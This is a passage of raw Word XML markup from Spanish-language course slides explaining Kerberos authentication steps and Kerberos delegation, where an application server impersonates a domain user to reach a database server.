              <v:shape w14:anchorId="2F479C6F" id="Textbox 206" o:spid="_x0000_s1122" type="#_x0000_t202" style="position:absolute;margin-left:386.5pt;margin-top:20.95pt;width:226.8pt;height:50.9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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="71EEF813" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="405" w:firstLine="148"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>7. Los clientes que utilizan el TGS asignado están autenticados y autorizados para</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="77AFEE67" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="1444"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>acceder al servidor de base de datos</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F64EC93" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD4AAF5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AF2DAE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05783A4A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7060E6B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507F353F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="229"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2A9205" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="17491"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="8042"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15770112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33944797" wp14:editId="5A8B3D27">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1243583</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-248165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2905125" cy="46228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62280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1C3AC5F5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="407" w:right="196" w:hanging="219"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>4. El cliente almacena TGT en la memoria y puede ser resolicitado por el administrador de sesión local</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="33944797" id="Textbox 207" o:spid="_x0000_s1123" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:97.9pt;margin-top:-19.55pt;width:228.75pt;height:36.4pt;z-index:1577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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1C3AC5F5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="407" w:right="196" w:hanging="219"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>4. El cliente almacena TGT en la memoria y puede ser resolicitado por el administrador de sesión local</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B30A560" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId87"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="20" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444552BB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1005"/>
        </w:tabs>
        <w:spacing w:before="61"/>
        <w:ind w:left="1005" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Delegación de Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32839757" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1726"/>
        </w:tabs>
        <w:spacing w:before="196" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="1726" w:right="1772"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Permite que las credenciales de usuario de un dominio autenticado se reutilicen para acceder a los recursos alojados en un servidor diferente de un dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D51C26A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449C463B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="190"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3F2AAA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1725"/>
        </w:tabs>
        <w:ind w:left="1725" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Esta utilidad es útil en aplicaciones o arquitecturas de varios niveles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24547E72" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5883A837" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="283"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD926CA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1726"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1726" w:right="981"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Por ejemplo</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">: Un usuario de dominio se autentica en un servidor de aplicaciones y el servidor de aplicaciones realiza una llamada al servidor de bases de datos. El servidor de aplicaciones puede solicitar acceso a los recursos del servidor de bases de datos como usuario de dominio (el usuario se suplanta) y no como cuenta de servicio del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>servidor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>aplicaciones</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB1E0F0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="198"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290F0A97" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1726"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1726" w:right="988"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La cuenta de servicio del servidor de aplicaciones debe ser de confianza para que la delegación pueda realizar solicitudes como usuario de dominio autenticado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41160D8F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06130477" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="169"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229EF0B8"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lastRenderedPageBreak/>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60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4685921E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId88"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="920" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D43697C"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59616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AB5DE15" wp14:editId="1E158819">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1528574</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>137250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9135110" cy="659765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5110" cy="6597650"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9135110" cy="6597650"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="209" name="Image 209"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId89" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="9134851" cy="6597220"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="210" name="Image 210"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId90" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2124326" y="146721"/>
                            <a:ext cx="5369458" cy="414400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="211" name="Graphic 211"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2049142" y="4158905"/>
                            <a:ext cx="2045970" cy="1999614"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2045970" h="1999614">
                                <a:moveTo>
                                  <a:pt x="1222883" y="1999488"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1206119" y="1967585"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1183259" y="1924075"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1164717" y="1949881"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7366" y="1117981"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1128395"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1157325" y="1960181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1138809" y="1985949"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1222883" y="1999488"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2045970" h="1999614">
                                <a:moveTo>
                                  <a:pt x="1855851" y="1965858"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="166255" y="813409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="171157" y="806196"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="184150" y="787146"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99695" y="775716"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="141224" y="850138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="159092" y="823912"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1848739" y="1976348"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1855851" y="1965858"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2045970" h="1999614">
                                <a:moveTo>
                                  <a:pt x="1947545" y="1562481"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1930273" y="1534261"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1903095" y="1489824"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1886242" y="1516799"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="102997" y="404622"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="96393" y="415290"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1879523" y="1527568"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1862709" y="1554480"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1947545" y="1562481"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2045970" h="1999614">
                                <a:moveTo>
                                  <a:pt x="2045843" y="1077976"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="169303" y="31584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172745" y="25400"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="184785" y="3810"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99695" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="147701" y="70358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163131" y="42659"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2039747" y="1089025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2045843" y="1077976"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="212" name="Graphic 212"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2404869" y="5510693"/>
                            <a:ext cx="257810" cy="307975"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="257810" h="307975">
                                <a:moveTo>
                                  <a:pt x="257555" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="307847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="257555" y="307847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="257555" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="E7E6E6"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="213" name="Graphic 213"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2404869" y="5510693"/>
                            <a:ext cx="257810" cy="307975"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="257810" h="307975">
                                <a:moveTo>
                                  <a:pt x="0" y="307847"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="257555" y="307847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="257555" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="307847"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="4471C4"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="214" name="Graphic 214"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2729481" y="5260757"/>
                            <a:ext cx="256540" cy="307975"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="256540" h="307975">
                                <a:moveTo>
                                  <a:pt x="256032" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="307847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="256032" y="307847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="256032" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="E7E6E6"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="215" name="Graphic 215"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
